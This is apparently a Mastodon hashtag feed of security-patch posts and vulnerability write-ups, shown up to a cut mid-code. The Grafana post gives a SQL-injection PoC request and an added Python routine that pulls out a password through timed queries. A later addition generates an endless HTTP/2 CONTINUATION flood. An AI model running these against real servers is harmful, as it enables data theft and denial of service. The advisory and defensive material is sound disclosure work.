#securitypatch

Corinna R.I.P. Natenom :nona: (CorinnaVahrenk1@troet.cafe)
2025-05-23

Well then, let's go...
Here's to tooting with you working even better!
#SecurityPatch

2025-05-13

Ivanti's latest patch locks down a vulnerability that let hackers sneak in like uninvited guests. Are your systems still at risk? Discover how these zero-day fixes could be your digital lifesaver.

thedefendopsdiaries.com/ivanti

#ivanti
#zeroday
#cybersecurity
#securitypatch
#epmm

2025-05-13

Fortinet just pulled off a rapid counterattack against a dangerous zero-day exploit in their FortiVoice systems. How did they turn a potential crisis into a showcase of quick, effective cybersecurity? Read on to find out.

thedefendopsdiaries.com/fortin

#fortinet
#zeroday
#cybersecurity
#infosec
#securitypatch

Mr Tech King (mrtechking)
2025-05-12

Still running older macOS Ventura/Sonoma or iPadOS 17? Apple's got you covered with fresh security updates (May 12). Patches vulnerabilities, no known active exploits. Grab 'em via System Settings.

Secure Your Older Mac and iPad with Apple's Latest Updates.
PUPUWEB Blog (pupuweb)
2025-03-25

Researchers warn a Next.js flaw, present for years, could've allowed hackers to bypass middleware-based authentication. Vercel patched it on March 18. #Nextjs #Cybersecurity #Vercel #TechNews #DataBreach #Authentication #SecurityPatch #Hacking
nemo™ 🇺🇦 (nemo@mas.to)
2025-03-17

Apple has released iOS 18.3.2 & iPadOS 18.3.2 to fix a zero-day vulnerability (CVE-2025-24201) in WebKit, which was exploited in targeted iPhone attacks. Update your devices now! 📱💻 More info: cyberinsider.com/apple-patches #Apple #iOS #SecurityPatch #ZeroDay #oldnewz

2024-11-26

The Joomla! Project announces the release of Joomla 5.2.2. This is a security and bug fix release for the 5.x series of Joomla.
Read about all the updates and bug fixes here:
joomla.org/announcements/relea
#Joomla #CMS #SecurityPatch #OpenSource


Windows 10 was first released to the public on July 29th, 2015, addressing the raging complaints about the mishaps of Windows 8 and 8.1. It simplified the user experience and made your workflow easier than before. Since then, updates to this version of Windows have been made to bring new features, to conduct performance improvements, and to make the operating system easier to use. Back then, Microsoft had promised at a conference that Windows 10 was going to be the last Windows version ever, and that there would be no Windows 11 or later.

When we witnessed Windows 11 being released on October 5th, 2021, we realized that Windows 10 wasn't the last version of Windows. Since then, the last update to Windows 10, 22H2, was released on October 18th, 2022, more than a year after the initial version of Windows 11 was out.

Today, we are reminding users that the end of support date for Windows 10 will be on October 14th, 2025. This means that you’ll no longer get the following:

  • Security updates
  • Bug fixes
  • New features

If you’re still running Windows 10 and your computer meets the minimum requirements for Windows 11, upgrade it now to keep getting security updates! Attempting to install Windows 11 on unsupported computers won’t work as Microsoft is trying to block workarounds, and even if it’s successful, you won’t get any updates.

In addition to that, future applications may not support Windows 10 anymore. Hence, you won't get any updates for them either.

Stay safe!

https://officialaptivi.wordpress.com/2024/09/13/windows-10-nears-end-of-support/

#2015 #BugFixes #cybersecurity #EndOfLife #EOL #microsoft #news #OutOfSupport #Patches #security #SecurityPatch #SecurityUpdate #SecurityUpdates #update #Updates #Windows #Windows10 #Windows11

2024-07-04

#AfterSpace update to Mastodon 4.2.10 carried out successfully.

Please keep tooting <3 :mastodon: #MastoAdmin #critical #SecurityUpdate #SecurityPatch

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-06-27

GitLab Critical Security Patch Release: 17.1.1

Date: June 26, 2024
CVE: CVE-2024-5655
Vulnerability Type: Improper Authorization
CWE: [[CWE-284]], [[CWE-79]], [[CWE-352]]
Sources: GitLab Patch Release

Synopsis

GitLab released a critical security patch (versions 17.1.1, 17.0.3, and 16.11.5) to address several vulnerabilities, including a critical issue that allows attackers to run pipelines as any user.

Issue Summary

The latest GitLab patch addresses critical and high-severity vulnerabilities that could allow attackers to exploit the system, such as running pipelines as any user and injecting stored XSS in commit notes. These vulnerabilities affect versions from 15.8 to 17.1.0.

CVE-2024-5655 - CRITICAL
An issue was discovered in GitLab CE/EE affecting all versions starting from 15.8 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows an attacker to trigger a pipeline as another user under certain circumstances.

CVE-2024-6323 - High
Improper authorization in global search in GitLab EE affecting all versions from 16.11 prior to 16.11.5 and 17.0 prior to 17.0.3 and 17.1 prior to 17.1.1 allows an attacker to leak the content of a private repository in a public project.

CVE-2024-4901 - High
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.9 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, where a stored XSS vulnerability could be imported from a project with malicious commit notes.

CVE-2024-1816 - Medium
An issue was discovered in GitLab CE/EE affecting all versions starting from 12.0 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows for an attacker to cause a denial of service using a crafted OpenAPI file.

CVE-2024-2191 - Medium
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.9 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows a merge request title to be visible publicly despite being set as project members only.

CVE-2024-3959 - Medium
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.7 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows private job artifacts to be accessed by any user.

CVE-2024-4557 - Medium
Multiple Denial of Service (DoS) conditions have been discovered in GitLab CE/EE affecting all versions starting from 1.0 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allowed an attacker to cause resource exhaustion via the banzai pipeline.

CVE-2024-5430 - Medium
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.10 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows a project maintainer to delete the merge request approval policy via GraphQL.

CVE-2024-4011 - Low
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.1 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows a non-project member to promote key results to objectives.

Technical Key Findings

  • Run pipelines as any user: A critical vulnerability (CVSS 9.6) enabling attackers to trigger pipelines under another user's identity.
  • Stored XSS in commit notes: High severity vulnerability (CVSS 8.7) allowing XSS injection through imported project commit notes.
  • CSRF on GraphQL API: High severity issue (CVSS 8.1) permitting unauthorized GraphQL mutations via CSRF attacks.

Vulnerable Products

  • GitLab CE/EE versions from 15.8 to 16.11.4, 17.0 to 17.0.2, and 17.1 to 17.1.0.

Impact Assessment

Exploiting these vulnerabilities can lead to unauthorized code execution, sensitive data exposure, and potential takeover of GitLab instances.

  • Run pipelines as any user: This vulnerability enables attackers to execute code and perform actions on behalf of other users without authorization. It bypasses standard access controls, allowing malicious actors to manipulate the CI/CD pipeline as if they were legitimate users. This could lead to unauthorized changes in the codebase, deployment of malicious software, or alteration of critical infrastructure configurations.
  • Stored XSS in commit notes: Stored XSS vulnerabilities persist in the application until explicitly removed, with malicious scripts injected into commit notes that can affect every user viewing these notes. The wide attack surface includes multiple users such as developers and project managers, increasing the risk as each view can trigger the malicious script.
  • CSRF on GraphQL API: This vulnerability is easy to exploit and has a wide-ranging impact on system confidentiality and integrity, affecting multiple users and components due to the extensive use of GraphQL APIs in GitLab.

Patches or Workaround

Immediate upgrade to the patched versions 17.1.1, 17.0.3, or 16.11.5 is strongly recommended. Details on upgrading can be found on the GitLab update page.

Tags

#GitLab #CVE-2024-5655 #CWE-284 #CWE-79 #CWE-352 #SecurityPatch #Vulnerability #DevOps #CI/CD

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-06-05

PoC released for Critical Privilege Escalation Vulnerability in Linux Kernel

Date: June 5, 2024

CVE: CVE-2023-3390

Vulnerability Type: Use-After-Free

CWE: [[CWE-416]]

Sources: SSD-disclosure NVD, Debian Security Tracker, Snyk

Synopsis

A PoC exploit has been released for a Linux kernel use-after-free vulnerability, identified as CVE-2023-3390, in the kernel's netfilter subsystem. This flaw, present in the nf_tables_api.c file, can allow a local attacker with the ability to execute low-privileged code on the target system to escalate privileges due to mishandled error handling. The vulnerability has been patched.

Issue Summary

CVE-2023-3390 is a critical vulnerability found in the Linux kernel's netfilter subsystem. The issue arises from a use-after-free error in the NFT_MSG_NEWRULE handling, potentially allowing attackers to exploit a dangling pointer within the same transaction. This flaw enables local attackers to gain elevated privileges on affected systems.

Technical Key Findings

The root cause of CVE-2023-3390, a critical privilege escalation vulnerability in the Linux kernel, lies in the improper management of integer values within the nft_parse_register_store function of the Netfilter subsystem. Specifically, this vulnerability is due to an integer overflow issue within the nft_validate_register_store function, which fails to correctly handle certain large values for register indices.

The CVE-2023-3390 vulnerability arises from an integer overflow in the validation logic of the Netfilter subsystem, which fails to properly handle large register values, allowing an attacker to perform out-of-bounds writes to kernel memory. This leads to potential privilege escalation, compromising the affected system. It is crucial to apply patches that correct this validation flaw to mitigate the risk.

For details, see the detailed root cause analysis at SSD Secure Disclosure.

Vulnerable Products

The vulnerability affects Debian 11 (Linux Kernel 5.10)

Impact Assessment

Exploiting this vulnerability allows a local attacker to gain root access, which can lead to severe consequences such as system compromise, data breaches, and service disruptions.

Patches or Workaround

Patches for CVE-2023-3390 have been released. Administrators are advised to update their Linux kernel to versions that include the commit 1240eb93f0616b21c675416516ff3d74798fdc97. Debian 11 received an updated kernel in July 2023: https://tracker.debian.org/news/1449040/accepted-linux-510179-3-source-into-oldstable-security

Tags

#CVE-2023-3390 #LinuxKernel #PrivilegeEscalation #UseAfterFree #Netfilter #SecurityPatch #Debian #AlmaLinux #Ubuntu2404

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-05-30

Check Point Vulnerability Report: CVE-2024-24919

Date: May 29, 2024

CVE: CVE-2024-24919

Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor

CWE: [[CWE-22]], [[CWE-425]]

Sources: Check Point, Tenable (CVE-2024-24919 | Tenable®), Tenable Blog

Synopsis

A critical vulnerability (CVE-2024-24919) has been identified in Check Point's CloudGuard Network Security appliance, allowing unauthorized actors to access sensitive information.

Issue Summary

The vulnerability, categorized as an 'Exposure of Sensitive Information to an Unauthorized Actor,' affects Check Point's CloudGuard Network Security appliances. Attackers can exploit this vulnerability to read sensitive information from gateways connected to the Internet and enabled with Remote Access VPN or Mobile Access. The flaw is actively exploited in the wild, making it a high-priority issue for administrators.

Technical Key Findings

The vulnerability arises from a path traversal issue in the appliance's handling of certain HTTP requests. Attackers can manipulate the request paths to access files on the device, bypassing standard access controls. The exploit involves sending crafted HTTP requests to the vulnerable endpoint, allowing unauthorized file reads.

Vulnerable Products

  • Check Point CloudGuard Network Security appliances with Remote Access VPN or Mobile Access enabled.

Impact Assessment

Exploiting this vulnerability can lead to unauthorized access to sensitive information, such as configuration files and password hashes. This could potentially escalate to full system compromise if critical files are accessed and misused.

Patches or Workaround

Check Point has released a hotfix to address this vulnerability. Administrators are urged to apply the patch immediately. The company also recommends placing the vulnerable gateway behind another security gateway with IPS and SSL inspection enabled as a temporary mitigation.

Tags

#CheckPoint #CVE-2024-24919 #InformationDisclosure #PathTraversal #NetworkSecurity #CloudGuard #SecurityPatch #VulnerabilityManagement #threatintelligence

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-05-15

VMware Patches Severe Security Flaws in Workstation and Fusion Products

Date: May 2024
CVE: CVE-2024-22267, CVE-2024-22268, CVE-2024-22269, CVE-2024-22270
Vulnerability Type: Use-After-Free, Heap Buffer Overflow, Information Disclosure
CWE: [[CWE-416]], [[CWE-122]], [[CWE-200]]
Sources: The Hacker News, Broadcom advisory

Issue Summary

Multiple severe security vulnerabilities have been identified in VMware Workstation and Fusion products. These vulnerabilities could potentially allow threat actors to execute arbitrary code, access sensitive information, and trigger denial-of-service (DoS) conditions. The affected versions include Workstation 17.x and Fusion 13.x.

Technical Key Findings

The vulnerabilities include a use-after-free issue in the Bluetooth device (CVE-2024-22267), a heap buffer overflow in the shader functionality (CVE-2024-22268), and two information disclosure flaws (CVE-2024-22269 and CVE-2024-22270). Exploiting these vulnerabilities requires local administrative privileges on a virtual machine, potentially allowing attackers to manipulate the VM's VMX process.

  • CVE-2024-22267 (CVSS score: 9.3) - A use-after-free vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host.

|VMware Product|Version|Running On|CVE|CVSSv3|Severity|Fixed Version|Workarounds|Additional Documentation|
|---|---|---|---|---|---|---|---|---|
|Workstation|17.x|Any|CVE-2024-22267|9.3|Critical|17.5.2|KB91760|None|
|Fusion|13.x|OS X|CVE-2024-22267|9.3|Critical|13.5.2|KB91760|None|

  • CVE-2024-22268 (CVSS score: 7.1) - A heap buffer-overflow vulnerability in the Shader functionality that could be exploited by a malicious actor with non-administrative access to a virtual machine with 3D graphics enabled to create a DoS condition

|VMware Product|Version|Running On|CVE|CVSSv3|Severity|Fixed Version|Workarounds|Additional Documentation|
|---|---|---|---|---|---|---|---|---|
|Workstation|17.x|Windows|CVE-2024-22268|7.1|Important|17.5.2|KB59146|None|
|Fusion|13.x|OS X|CVE-2024-22268|7.1|Important|13.5.2|KB59146|None|

  • CVE-2024-22269 (CVSS score: 7.1) - An information disclosure vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine.

|VMware Product|Version|Running On|CVE|CVSSv3|Severity|Fixed Version|Workarounds|Additional Documentation|
|---|---|---|---|---|---|---|---|---|
|Workstation|17.x|Any|CVE-2024-22269|7.1|Important|17.5.2|KB91760|None|
|Fusion|13.x|OS X|CVE-2024-22269|7.1|Important|13.5.2|KB91760|None|

  • CVE-2024-22270 (CVSS score: 7.1) - An information disclosure vulnerability in the Host Guest File Sharing (HGFS) functionality that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine

|VMware Product|Version|Running On|CVE|CVSSv3|Severity|Fixed Version|Workarounds|Additional Documentation|
|---|---|---|---|---|---|---|---|---|
|Workstation|17.x|Any|CVE-2024-22270|7.1|Important|17.5.2|None|None|
|Fusion|13.x|OS X|CVE-2024-22270|7.1|Important|13.5.2|None|None|

Vulnerable Products

  • VMware Workstation versions 17.x
  • VMware Fusion versions 13.x

Impact Assessment

Exploiting these vulnerabilities could lead to significant security breaches, including arbitrary code execution on the host machine, sensitive data exposure, and system crashes. The critical nature of these flaws underscores the need for immediate remediation to prevent potential attacks.

Patches or Workarounds

VMware has released patches for these vulnerabilities in versions 17.5.2 (Workstation) and 13.5.2 (Fusion). As temporary measures, users are advised to disable Bluetooth support and 3D acceleration features on virtual machines. However, there is no workaround for CVE-2024-22270.

Tags

#VMware #CVE-2024-22267 #CVE-2024-22268 #CVE-2024-22269 #CVE-2024-22270 #UseAfterFree #HeapBufferOverflow #InformationDisclosure #Virtualization #Workstation #Fusion #SecurityPatch

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-04-30

Grafana SQL Injection Vulnerability Analysis

Date: 22nd March 2024
CVE: N.A.
Vulnerability Type: SQL Injection
CWE: [[CWE-89]]
Sources: FDlucifer GitHub, GBHackers

Issue Summary

A SQL injection vulnerability has been identified in Grafana, an open-source platform for monitoring and observability. This vulnerability allows authenticated users to execute arbitrary SQL commands through the Grafana SQL package, affecting all versions of the software. To exploit this SQL injection vulnerability, someone must log in to the Grafana web backend with a valid account (for example a Read-Only one), then send a malicious POST request to /api/ds/query with a crafted “rawSql” entry.

Once attackers log in to the Grafana web backend, they have the ability to interact with various APIs provided by Grafana, including the /api/ds/query API endpoint, which is used for making data queries within Grafana. They can send a POST request to the /api/ds/query API. This request includes the rawSql parameter, which allows direct input of SQL commands. They can then modify the “rawSql” field to execute (malicious) SQL strings that lead to a time-based blind SQL injection vulnerability, and then leak data from databases. Time-based blind SQL injection is a subtype of SQL injection where the attacker can determine whether a part of the injected SQL statement is true based on how long it takes the application to respond. The SQL statements typically include commands that cause the database to wait for a specified amount of time (SLEEP, WAITFOR DELAY) before responding. This time delay allows the attacker to infer information about the database depending on whether the condition in the SQL query is true or false.

Example:
Running the SQL query SELECT * FROM users WHERE username='admin' AND SLEEP(10) would let us know that there is a user named 'admin' if the answer takes 10 seconds.

Technical Key Findings

The vulnerability originates in the SQL data source processing functions within Grafana's codebase, particularly in the SqlDatasource.ts and datasource.ts files. Attackers exploit this by sending specially crafted SQL queries via POST requests to the /api/ds/query endpoint.

Grafana v8.0.4 PoC:

POST /api/ds/query HTTP/1.1
Host: 172.16.32.57:3000
User-Agent: qzd_security_test_user_agent
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.32.57:3000/d/AEo5dM44k/pei-xun-xi-tong?orgId=1
content-type: application/json
x-grafana-org-id: 1
Content-Length: 142
Origin: http://172.16.32.57:3000
DNT: 1
Connection: close
Cookie: grafana_session=ede75844e20b0001a30e2c8522e5f1fc

{"queries":[{"refId":"A","format":"time_series","datasourceId":2,"rawSql":"(SELECT 8424 FROM (SELECT(SLEEP(2)))MKRN)","maxDataPoints":10000}]}

Then log in to the backend, click “Explore”, use Burp to capture the POST /api/ds/query HTTP/1.1 packet, and modify the “rawSql” entry to malicious SQL strings; then we get a time-based SQL injection.

Impact Assessment

Successful exploitation could allow an attacker to manipulate or extract data from databases connected to Grafana, leading to potential data breaches and compromise of monitoring data integrity.

Patches or Workaround

The Grafana security team does not recognize this flaw as a vulnerability but rather as a feature of the backend system. This is disputed by the researcher, leading him to publicly disclose the issue.


Tags

#Grafana #CVE-2023-3128 #SQLInjection #DataBreach #SecurityPatch
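Added example (editor's, not from the post above and not Grafana's own code): the time-based blind extraction the post describes, driven through the same JSON body shape as the PoC request. To run offline, the data source's database is replaced by an in-memory SQLite table and SLEEP() is a stand-in that records the requested delay instead of waiting; on a live target the elapsed time of the HTTP POST replaces that recorded value. SQLite's UNICODE() is assumed as the equivalent of MySQL's ORD(); the table, the secret and the datasourceId are constructed.

```python
import json
import sqlite3

# Constructed stand-in for the database behind the Grafana data source.
SECRET = "s3cr3t!"


class SimulatedBackend:
    """Executes whatever arrives in rawSql, as the post describes Grafana doing,
    but against in-memory SQLite with a SLEEP() that only records the delay."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("SLEEP", 1, self._sleep)  # stand-in for MySQL SLEEP()
        self.db.execute("CREATE TABLE users(username TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
        self.slept = 0.0
        self.requests = 0

    def _sleep(self, seconds):
        self.slept += float(seconds)
        return 0

    def post_ds_query(self, body):
        """Mimics POST /api/ds/query: returns the simulated response time in seconds."""
        self.requests += 1
        self.slept = 0.0
        for q in json.loads(body)["queries"]:
            self.db.execute(q["rawSql"]).fetchall()
        return self.slept


def build_body(raw_sql, datasource_id=2):
    """Same JSON shape as the PoC request in the post (datasourceId assumed)."""
    return json.dumps({"queries": [{"refId": "A", "format": "time_series",
                                    "datasourceId": datasource_id,
                                    "rawSql": raw_sql, "maxDataPoints": 10000}]})


def probe(backend, condition, delay=2, threshold=1.5):
    """One yes/no question. The query only stalls when `condition` is true, so the
    answer is read from the response time, never from the response body."""
    raw = f"SELECT 1 FROM (SELECT CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END) probe"
    return backend.post_ds_query(build_body(raw)) >= threshold


def extract(backend, expr, max_len=64):
    """Recover the string that `expr` (a scalar subquery) evaluates to, one character
    at a time, by binary search over printable ASCII (about 7 probes per character).
    UNICODE() is SQLite's name for MySQL's ORD(); SUBSTR/LENGTH are the same in both."""
    result = ""
    for i in range(1, max_len + 1):
        if not probe(backend, f"LENGTH(({expr})) >= {i}"):
            break  # ran past the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(backend, f"UNICODE(SUBSTR(({expr}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    be = SimulatedBackend()
    pw = extract(be, "SELECT password FROM users WHERE username = 'admin'")
    print(f"recovered {pw!r} in {be.requests} requests")
```

The request count is the practical signal here: a read-only user issuing dozens of near-identical /api/ds/query POSTs, each taking exactly the injected delay, is what a rate limit or a slow-query alert on the data source would catch.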

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-04-24

Buffer Overflow in GNU C Library Affects Older Versions

Date: April 17, 2024

CVE: CVE-2024-2961

Vulnerability Type: Out-of-bounds Write

CWE: [[CWE-787]]

Sources: SecurityVulnerability.io, NVD, Mitigation blog

Issue Summary

A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.

Technical Key Findings

The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.

Vulnerable Products

All versions of the GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of buffer overflow presence in glibc!)

Impact Assessment

The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.

Patches or Workaround

The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.

Check if you are vulnerable

# The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).
ldd --version

# Check if the vulnerable encodings are enabled in iconv:
iconv -l | grep -E 'CN-?EXT'

If they are, you will see an output like:

ISO-2022-CN-EXT//
ISO2022CNEXT//

Tags

#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc
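Added example (editor's, not part of the post above): the two checks and the gconv mitigation the post mentions, as functions that work on captured text so they can be exercised without touching a real host. The ldd, iconv -l and gconv-modules samples are constructed; the gconv-modules layout (alias/module lines naming ISO-2022-CN-EXT) and the need to run iconvconfig afterwards to rebuild gconv-modules.cache are assumptions about a typical glibc install, and the 2.40 threshold simply follows the post, so a "vulnerable" answer from the version check means "compare against your distribution's advisory", since distributions backport fixes.

```python
import re
import subprocess

# Constructed sample outputs (not captured from a real host).
SAMPLE_LDD = "ldd (Ubuntu GLIBC 2.35-0ubuntu3.6) 2.35\nCopyright (C) 2022 Free Software Foundation, Inc.\n"
SAMPLE_ICONV_LIST = "ISO-2022-CN//\nISO2022CN//\nISO-2022-CN-EXT//\nISO2022CNEXT//\nISO-2022-JP//\n"
# Assumed layout of a gconv-modules file; the real one lives in the gconv directory
# of the glibc install (for example /usr/lib/x86_64-linux-gnu/gconv/gconv-modules).
SAMPLE_GCONV_MODULES = """\
#\tfrom\t\t\tto\t\t\tmodule\t\tcost
alias\tISO2022CNEXT//\t\tISO-2022-CN-EXT//
module\tISO-2022-CN-EXT//\tINTERNAL\t\tISO-2022-CN-EXT\t1
module\tINTERNAL\t\tISO-2022-CN-EXT//\tISO-2022-CN-EXT\t1
alias\tISO2022CN//\t\tISO-2022-CN//
module\tISO-2022-CN//\tINTERNAL\t\tISO-2022-CN\t1
"""

CN_EXT = re.compile(r"ISO-?2022-?CN-?EXT")


def parse_glibc_version(ldd_output):
    """(major, minor) from the first line of `ldd --version`; the trailing number on
    that line is the glibc version on Debian, Ubuntu and Fedora style output."""
    first = ldd_output.splitlines()[0]
    found = re.findall(r"\b(\d+)\.(\d+)\b", first)
    if not found:
        raise ValueError(f"no glibc version in: {first!r}")
    major, minor = found[-1]
    return int(major), int(minor)


def glibc_vulnerable(version, fixed_in=(2, 40)):
    """Version-only check using the post's stated fixed version (distros backport,
    so this is a prompt to read the vendor advisory, not a final verdict)."""
    return version < fixed_in


def cn_ext_enabled(iconv_list_output):
    """True if the charsets the bug lives in appear in `iconv -l` output."""
    names = {line.strip().rstrip("/") for line in iconv_list_output.splitlines()}
    return bool(names & {"ISO-2022-CN-EXT", "ISO2022CNEXT"})


def disable_cn_ext(gconv_modules_text):
    """Comment out every gconv-modules line that refers to ISO-2022-CN-EXT.
    Returns (new_text, lines_disabled). After writing the file back, run
    `iconvconfig` so gconv-modules.cache is rebuilt and the change takes effect."""
    out, disabled = [], 0
    for line in gconv_modules_text.splitlines():
        if not line.startswith("#") and CN_EXT.search(line):
            out.append("# disabled (CVE-2024-2961): " + line)
            disabled += 1
        else:
            out.append(line)
    return "\n".join(out) + "\n", disabled


def check_host():
    """Run both checks on this machine (Linux with glibc)."""
    ldd = subprocess.run(["ldd", "--version"], capture_output=True, text=True).stdout
    lst = subprocess.run(["iconv", "-l"], capture_output=True, text=True).stdout
    version = parse_glibc_version(ldd)
    return {"glibc": version, "version_vulnerable": glibc_vulnerable(version),
            "cn_ext_enabled": cn_ext_enabled(lst)}


if __name__ == "__main__":
    print(check_host())
```

Disabling the charset is the only control that removes the reachable code path on an unpatched box; the version check alone tells you nothing on a distribution that backported the fix into an older version string.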

2024-04-17

A significant security issue involving the Lighttpd web server was uncovered, affecting baseboard management controllers (BMCs) used in Intel and Lenovo devices. This vulnerability, a Heap Out-of-bounds read (CWE-125), was discovered in the Lighttpd module used in Intel Server System devices and Lenovo BMC firmware. The vulnerability was first discovered and fixed in August 2018, but due to the lack of a Common Vulnerabilities and Exposures (CVE) identifier and an advisory, it was overlooked by developers, including those of AMI MegaRAC BMC. This oversight resulted in the vulnerability persisting in products made by Intel and Lenovo.

The vulnerability allows an attacker to exfiltrate sensitive data, such as process memory addresses, which can then be used to bypass security mechanisms like Address Space Layout Randomization (ASLR).

The Binarly research team played a crucial role in identifying and documenting this vulnerability, assigning identifiers to the affected Intel and Lenovo BMC firmware and to vulnerable Lighttpd builds in general.

binarly.io/blog/lighttpd-gains

#cybersecurity #lighttpd #webserver #vulnerability #bmc #aslr #intel #lenovo #securitypatch #firmware #binarly

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2024-04-05

HTTP/2 CONTINUATION Flood Vulnerability Analysis

Date: April 3, 2024
CVE: N/A
Vulnerability Type: CWE-400 (Resource Exhaustion)
CWE: [[CWE-400]]
Sources: nowotarski.info

Issue Summary

The CONTINUATION Flood vulnerability exploits a flaw in [[HTTP2 protocol]] implementations, causing server resource exhaustion. Identified by Bartek Nowotarski, it demonstrates a significant threat as it allows attackers to disrupt server availability with minimal resources. Unlike traditional attacks, this method is not visible in HTTP access logs, complicating detection and mitigation efforts.

Technical Key Findings

Attackers initiate an infinite stream of CONTINUATION frames without the END_HEADERS flag, leading servers to allocate excessive resources for processing, resulting in CPU exhaustion or memory depletion. This vulnerability has been observed across various HTTP/2 implementations, including major servers like [[Apache]] and [[Node.js]]. The flaw's severity is amplified by its low detection rate, as affected requests do not appear in access logs.

Vulnerable Products

Affected projects and products include [[Apache httpd]], [[Envoy]], and various HTTP/2 libraries, particularly in languages like [[Golang]], [[Ruby]], and [[Node.js]]. The vulnerability spans across implementations, affecting a broad range of servers utilizing HTTP/2.

Impact Assessment

The CONTINUATION Flood vulnerability can severely impact server performance and availability. In extreme cases, it can crash servers or lead to a complete denial of service with minimal attacker effort. Its undetectability in standard logging mechanisms further complicates mitigation, potentially allowing attackers to exploit this vulnerability without immediate detection.

Patches or Workaround

As of the reporting date, specific patches or workarounds were not mentioned. However, standard mitigation strategies for similar vulnerabilities include updating affected software, limiting frame sizes, and employing timeouts for incomplete header frame sequences.

Tags

#HTTP/2, #DoS, #ResourceExhaustion, #ServerVulnerability, #SecurityPatch
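Added example (editor's, not from the post above and not from any of the affected projects): the frame sequence the post describes and the server-side limits it lists as mitigations. The frame encoder follows the 9-byte HTTP/2 frame header (24-bit length, type, flags, 31-bit stream id) with HEADERS = 0x1, CONTINUATION = 0x9 and END_HEADERS = 0x4; HPACK, padding and priority fields are left out because the attack never needs a valid header block. The byte cap and CONTINUATION count cap are illustrative values, and the logged event stands in for the access-log entry the post notes is never written.

```python
import struct

HEADERS, CONTINUATION = 0x1, 0x9
END_HEADERS = 0x4  # flag on HEADERS and CONTINUATION frames


class FloodRejected(Exception):
    pass


def frame(ftype, flags, stream_id, payload):
    """Serialize one HTTP/2 frame: 24-bit length, type, flags, 31-bit stream id, payload."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack("!I", stream_id & 0x7FFFFFFF) + payload)


def parse_frame(data):
    """Split the 9-byte header off one frame (padding/priority not modelled)."""
    length = int.from_bytes(data[:3], "big")
    stream_id = struct.unpack("!I", data[5:9])[0] & 0x7FFFFFFF
    return data[3], data[4], stream_id, data[9:9 + length]


def legit_header_block(stream_id, fragments):
    """Well-formed block: HEADERS, then CONTINUATIONs, the last one sets END_HEADERS."""
    frames = []
    for i, frag in enumerate(fragments):
        ftype = HEADERS if i == 0 else CONTINUATION
        flags = END_HEADERS if i == len(fragments) - 1 else 0
        frames.append(frame(ftype, flags, stream_id, frag))
    return frames


def continuation_flood(stream_id, frame_size=16384):
    """Attacker traffic as the post describes it: HEADERS with END_HEADERS clear, then
    CONTINUATION frames that never set it. A generator, so it is endless like the attack."""
    yield frame(HEADERS, 0, stream_id, b"\x00" * frame_size)
    while True:
        yield frame(CONTINUATION, 0, stream_id, b"\x00" * frame_size)


class HeaderBlockCollector:
    """Server-side reassembly with two of the post's mitigations: a cap on buffered
    header-block bytes and on the number of CONTINUATION frames. A timeout for an
    unfinished block would be the third control (not modelled here)."""

    def __init__(self, max_block_bytes=32768, max_continuations=8):
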